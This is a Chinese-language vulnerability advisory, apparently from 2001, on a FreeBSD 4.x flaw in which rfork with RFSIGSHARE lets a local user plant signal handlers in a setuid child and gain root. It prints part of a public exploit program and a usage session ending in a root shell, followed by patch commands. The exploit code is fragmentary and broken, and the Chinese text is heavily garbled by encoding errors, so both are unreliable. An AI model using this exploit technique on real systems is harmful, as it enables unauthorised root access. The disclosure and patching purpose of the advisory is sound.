發(fā)現(xiàn) FreeBSD 4.3 存在一個(gè)設(shè)計(jì)上的漏洞，它允許用戶在其它進(jìn)程中插入 signal handlers。問題出在 rfork(RFPROC|RFSIGSHARE) ，如果子進(jìn)程 exec() 一個(gè) setuid 程序，然后父進(jìn)程設(shè)置一個(gè) signal handlers，這個(gè) signal handlers 將會(huì)在子進(jìn)程中被復(fù)制。發(fā)送一個(gè)信號(hào)給子進(jìn)程將能導(dǎo)致 signal handlers 被執(zhí)行。
利用此漏洞，本地攻擊者能取得 root 權(quán)限。
以下代碼僅僅用來測(cè)試和研究這個(gè)漏洞，如果您將其用于不正當(dāng)?shù)耐緩秸?qǐng)后果自負(fù)
-------------vvfreebsd.c----------------------
/}
}
printf("vvfreebsd. Written by Georgi Guninski\n");
printf("shall jump to %x\n",vv1);
if(!(pid=rfork(RFPROC|RFSIGSHARE)))
{
printf("child=%d\n",getpid());
// /usr/bin/login and rlogin work for me. ping gives nonsuid shell
// if(!execl("/usr/bin/rlogin","rlogin","localhost",0))
kill(pid,MYSIG);
printf("done\n");
while(42);
}
...............................
.........................
.............
受影響版本：
FreeBSD 4.3 4.2 4.1 4.0
早期版本也許受影響
解決方案：
尚無
****** 2001-07-14 add by NetDemon(netdemon@20cn.net) ******
測(cè)試程序使用方法：
netdemon%gcc -o vvbsd vvbsd.c
netdemon%cp /bin/sh /tmp
netdemon%./vvbsd
vvfreebsd. Written by Georgi Guninski
shall jump to bfbffe71
child=61056
login:
login: # done
#
FreeBSD以此作出補(bǔ)丁
方法：
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:42/signal-4.3.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:42/signal-4.3.patch.asc
# cd /usr/src/sys/kern
# patch -p < /path/to/patch

最新評(píng)論